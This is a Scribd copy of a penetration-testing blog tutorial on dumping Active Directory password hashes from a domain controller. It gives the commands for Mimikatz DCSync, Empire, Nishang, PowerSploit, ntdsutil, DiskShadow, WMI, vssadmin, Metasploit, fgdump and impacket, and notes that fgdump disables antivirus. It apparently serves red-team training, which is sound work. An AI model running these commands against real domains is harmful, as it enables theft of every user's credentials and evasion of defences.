Scribd
Upload
240 views30 pages

Dumping PDF

The document discusses techniques for extracting password hashes from a domain controller, including using Mimikatz to dump hashes via Directory Replication Service or directly from the lsass.exe process, without having to directly authenticate or copy the NTDS.DIT file.

Uploaded by

jose
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
240 views30 pages

Dumping PDF

The document discusses techniques for extracting password hashes from a domain controller, including using Mimikatz to dump hashes via Directory Replication Service or directly from the lsass.exe process, without having to directly authenticate or copy the NTDS.DIT file.

Uploaded by

jose
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 30

Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

July 4, Dumping Domain Password Hashes Search the Lab


2018
netbiosX Post Exploitation Active Directory, DCSync, DiskShadow, Empire, Search...
Metasploit, Mimikatz, Nishang, NTDS.DIT, Red Team, vssadmin, vssown, WMI Leave a
comment

It is very common during penetration tests where domain administrator access has been Author
achieved to extract the password hashes of all the domain users for offline cracking and
analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT)
with some additional information like group memberships and users.
netbiosX
The NTDS.DIT file is constantly in use by the operating system and therefore cannot be
copied directly to another location for extraction of information. This file can be found in the
following Windows location: Follow PenTest Lab
1 C:\Windows\NTDS\NTDS.dit Enter your email address to follow this blog and
receive notifications of new posts by email.
There are various techniques that can be used to extract this file or the information that is
stored inside it however the majority of them are using one of these methods: Join 1,692 other followers

1. Domain Controller Replication Services Enter your email address

2. Native Windows Binaries


Follow
3. WMI

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Recent Posts
Mimikatz
Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to Dumping Domain Password Hashes
retrieve the password hashes from the NTDS.DIT file. This technique eliminates the need Kerberoast
to authenticate directly with the domain controller as it can be executed from any system Command and Control – Browser
that is part of the domain from the context of domain administrator. Therefore it is the SPN Discovery
standard technique for red teams as it is less noisy.
Situational Awareness
1 lsadump::dcsync /domain:pentestlab.local /all /csv

Categories
Coding (10)
Defense Evasion (20)
Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
Mobile Pentesting (7)
Network Mapping (1)
Post Exploitation (13)
Privilege Escalation (14)
Red Team (28)
Social Engineering (11)
Mimikatz – Dump Domain Hashes via DCSync
Tools (7)
VoIP (4)
By specifying the domain username with the /user parameter Mimikatz can dump all the
account information of this particular user including his password hash. Web Application (14)
Wireless (2)
1 lsadump::dcsync /domain:pentestlab.local /user:test

Archives

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
July 2018
June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
August 2017
July 2017
June 2017
May 2017
April 2017
March 2017
Mimikatz – Dump User Hash via DCSync February 2017
January 2017
Alternatively executing Mimikatz directly in the domain controller password hashes can be
November 2016
dumped via the lsass.exe process.
September 2016
1 privilege::debug February 2015
2 lsadump::lsa /inject
January 2015
July 2014
April 2014
June 2013
May 2013
April 2013
March 2013
February 2013
January 2013
December 2012
November 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
October 2012
September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
[New Post] Dumping Domain Password Hashes
Mimikatz – Dump Domain Hashes via lsass pentestlab.blog/2018/07/04/dum… #pentestlab
#redteam 3 hours ago

The password hashes of the domain users will retrieved. Abusing the COM Registry Structure: CLSID,
LocalServer32, & InprocServer32
bohops.com/2018/06/28/abu… 1 day ago
One of the best workshops of @Steel_Con !
twitter.com/myexploit2600/… 3 days ago
@danielhbohannon @gentilkiwi No Golden
Ticket? https://t.co/cxrFX3kQQu 4 days ago
RT @n00py1: @FitToRoot Tool usage/ technique
walkthroughs are always useful to me, like what
@netbiosX does at pentestlab.blog 4 days ago

Follow @netbiosX

Pen Test Lab Stats


3,106,132 hits

Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Tricks 0

Exploit Databases
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0

Mimikatz – Dump domain hashes via lsadump

Pentest Blogs
Empire Carnal0wnage Ethical Hacking Tutorials 0
PowerShell Empire has two modules which can retrieve domain hashes via the DCSync Coresec Pentest tutorials,Code,Tools 0
attack. Both modules needs to be executed from the perspective of domain administrator Notsosecure From Pentesters To Pentesters 0
and they are using Microsoft replication services. These modules rely on the Invoke-
Pentestmonkey Cheatsheets,Tools and SQL
Mimikatz PowerShell script in order to execute Mimikatz commands related to DCSync.
Injection 0
The following module will extract the domain hashes to a format similar to the output of
Pentester Web Application Testing,Tips,Testing
Metasploit hashdump command.
Tools 0
1 usemodule credentials/mimikatz/dcsync_hashdump Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Professional
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London


April 29th, 2014

The big day is here.

Empire – DCSync Hashdump Module

The DCSync module requires a user to be specified in order to extract all the account Facebook Page
information.
Penetrati…
10K likes

Like Page

Empire – DCSync Module


Be the first of your friends to
like this
The following information will obtained:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Advertisements

Report this ad

Empire – DCSync Account Information

Nishang
Nishang is a PowerShell framework which enables red teamers and penetration testers to
perform offensive operations against systems. The Copy-VSS script can be used to
automatically extract the required files: NTDS.DIT, SAM and SYSTEM. The files will be
extracted into the current working directory or into any other folder that will specified.

1 Import-Module .\Copy-VSS.ps1
2 Copy-VSS
3 Copy-VSS -DestinationDir C:\ShadowCopy\

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Nishang – Extract NTDS PowerShell

Alternatively the script can be executed from an existing Meterpreter session by loading
the PowerShell extension.

1 load powershell
2 powershell_import /root/Copy-VSS.ps1
3 powershell_execute Copy-VSS

It is also possible to establish a direct PowerShell session with the command


powershell_shell in order to extract the files once the script has been imported to the
existing Meterpreter session.

1 Copy-VSS
2 Copy-VSS -DestinationDir C:\Ninja

Nishang – Extract NTDS Meterpreter PowerShell

PowerSploit
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
PowerSploit contains a PowerShell script which utilizes the volume shadow copy service
to create a new volume that could be used for extraction of files.

1 Import-Module .\VolumeShadowCopyTools.ps1
2 New-VolumeShadowCopy -Volume C:\
3 Get-VolumeShadowCopy

PowerSploit – VolumeShadowCopyTools

Alternatively it can be executed from an existing Meterpreter session by loading the


PowerShell extension.

1 powershell_shell
2 New-VolumeShadowCopy -Volume C:\
3 Get-VOlumeShadowCopy

PowerSploit – Volume Shadow Copy

Files can then copied from the new volume to a destination path with the command copy.

Invoke-DCSync
The Invoke–DCSync is a PowerShell script that was developed by Nick Landers and
leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz to

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
retrieve hashes with the Mimikatz method of DCSync. Executing directly the function will
generate the following output:

1 Invoke-DCSync

Invoke-DCSync – PowerShell

The results will be formatted into four tables: Domain, User, RID and Hash. However
executing the Invoke-DCSync with the parameter -PWDumpFormat will retrieve the
hashes in the format: user:id:lm:ntlm:::

1 Invoke-DCSync -PWDumpFormat

Invoke-DCSync – PowerShell PWDump Format

The same output can be achieved by running the script from an existing Meterpreter
session.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Invoke-DCSync Metasploit

With the PWDumpFormat:

Invoke-DCSync – Metasploit PWDump Format

ntdsutil
The ntdsutil is a command line tool that is part of the domain controller ecosystem and its
purpose is to enable administrators to access and manage the windows Active Directory
database. However it can be abused by penetration testers and red teams to take a
snapshot of the existing ntds.dit file which can be copied into a new location for offline
analysis and extraction of password hashes.

1 ntdsutil
2 activate instance ntds
3 ifm
4 create full C:\ntdsutil
5 quit
6 quit

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
ntdsutil

Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will
be saved in the Active Directory and the SAM and SYSTEM files will be saved into the
Registry folder.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
ntdsutil – ntds

DiskShadow
DiskShadow is a Microsoft signed binary which is used to assist administrators with
operations related to the Volume Shadow Copy Service (VSS). Originally bohops wrote
about this binary in his blog. This binary has two modes interactive and script and
therefore a script file can be used that will contain all the necessary commands to
automate the process of NTDS.DIT extraction. The script file can contain the following
lines in order to create a new volume shadow copy, mount a new drive, execute the copy
command and delete the volume shadow copy.

1 set context persistent nowriters


2 add volume c: alias someAlias
3 create
4 expose %someAlias% z:
5 exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds
6 delete shadows volume %someAlias%
7 reset

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
It should be noted that the DiskShadow binary needs to executed from the
C:\Windows\System32 path. If it is called from another path the script will not executed
correctly.

1 diskshadow.exe /s c:\diskshadow.txt

DiskShadow

Running the following command directly from the interpreter will list all the available
volume shadow copies of the system.

1 diskshadow
2 LIST SHADOWS ALL

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
diskshadow – Retrieve Shadow Copies

The SYSTEM registry hive should be copied as well since it contains the key to decrypt
the contents of the NTDS file.

1 reg.exe save hklm\system c:\exfil\system.bak

diskshadow – Copy system from Registry

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
WMI
Sean Metcalf demonstrated in his blog that it is possible to remotely extract the NTDS.DIT
and SYSTEM files via WMI. This technique is using the vssadmin binary to create the
volume shadow copy.

1 wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Create Volume Shadow Copy

Then it executes the copy command remotely in order to extract the NTDS.DIT file from
the volume shadow copy into another directory on the target system.

1 wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Copy NTDS File

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
The same applies and for the SYSTEM file.

1 wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Copy System File

The extracted files can then transferred from the domain controller into another Windows
system for dumping the domain password hashes.

1 PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit


2 PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.h

Transfer Files via Copy

Instead of credentials if a Golden ticket has been generated it can be used for
authentication with the domain controller via Kerberos.

vssadmin
The volume shadow copy is a Windows command line utility which enables administrators
to take backups of computers, volumes and files even if they are in use by the operating
system. Volume Shadow Copy is running as a service and requires the filesystem to be
formatted as NTFS which all the modern operating systems are by default. From a

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Windows command prompt executing the following will create a snapshot of the C: drive in
order files that are not normally accessible by the user to be copied into another location
(local folder, network folder or removable media).

1 vssadmin create shadow /for=C:

vssadmin – Create Volume Shadow Copy

Since all the files in the C: drive have been copied into another location
(HarddiskVolumeShadowCopy1) they are not directly used by the operating system and
therefore can be accessed and copied into another location. The command copy and will
copy the NTDS.DIT and SYSTEM files to a new created folder on the local drive named
ShadowCopy.

1 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\
2 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Copy Files from Volume Shadow Copy

These files needs to be copied from the domain controller into another host for further
processing.

ShadowCopy – Files

vssown

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Similar to the vssadmin utility Tim Tomes developed vssown which is a visual basic script
that can create and delete volume shadow copies, run arbitrary executables from an
unmounted shadow copy and initiate and stop the volume shadow copy service.

1 cscript vssown.vbs /start


2 cscript vssown.vbs /create c
3 cscript vssown.vbs /list
4 cscript vssown.vbs /delete

vssown – Volume Shadow Copy

The required files can be copied with the command copy.

1 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\
2 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\
3 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
vssown – Copy NTDS, SYSTEM and SAM Files

Metasploit
Metasploit framework has a module which authenticates directly with the domain controller
via the server message block (SMB) service, creates a volume shadow copy of the system
drive and download copies of the NTDS.DIT and SYSTEM hive into the Metasploit
directories. These files can be used with other tools like impacket that can perform
extraction of active directory password hashes.

1 auxiliary/admin/smb/psexec_ntdsgrab

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Metasploit – NTDS Module

There is also a post exploitation module which can be linked into an existing Meterpreter
session in order to retrieve domain hashes via the ntdsutil method.

1 windows/gather/credentials/domain_hashdump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Alternatively if there is an existing Meterpreter session to the domain controller the
command hashdump can be used. However this method is not considered safe as it
might crash the domain controller.

1 hashdump

Metasploit – Hashdump on DC

fgdump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
The fgdump is an old executable file which can extract LanMan and NTLM password
hashes. It can be executed locally or remotely if local administrator credentials have been
acquired. During execution fgdump will attempt to disable the antivirus that might run on
the system and if it is successful will write all the data in two files. If there is an antivirus or
an endpoint solution fgdump should not be used as a method of dumping password
hashes to avoid detection since it is being flagged by most antivirus companies including
Microsoft’s Windows Defender.

1 fgdump.exe

fgdump – Domain Controller

The password hashes can be retrieved by examining the contents of the .pwdump file.

1 type 127.0.0.1.pwdump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
fgdump – pwdump File

NTDS Extraction
Impacket is a collection of python scripts that can be used to perform various tasks
including extraction of contents of the NTDS file. The impacket-secretsdump module
requires the SYSTEM and the NTDS database file.

1 impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit

impacket – Extract NTDS Contents

Furthermore impacket can dump the domain password hashes remotely from the
NTDS.DIT file by using the computer account and its hash for authentication.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1 impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee

impacket – Extract NTDS Contents Remotely

As an alternative solution to impacket, NTDSDumpEx binary can extract the domain


password hashes from a Windows host.

1 NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
NTDSDumpEx

There is also a shell script adXtract that can export the username and password hashes
into a format that can be used by common password crackers such as John the Ripper
and Hashcat.

1 ./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab

adXtract

The script will write all the information into various files under the project name and when
the decryption of the database file NTDS is finished will export the list of users and
password hashes into the console. The script will provide extensive information regarding
the domain users as it can be demonstrated below.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
adXtract – List of Users

The password hashes will be presented into the following format.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Advertisements

Report this ad

Report this ad

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Older posts

Create a free website or blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like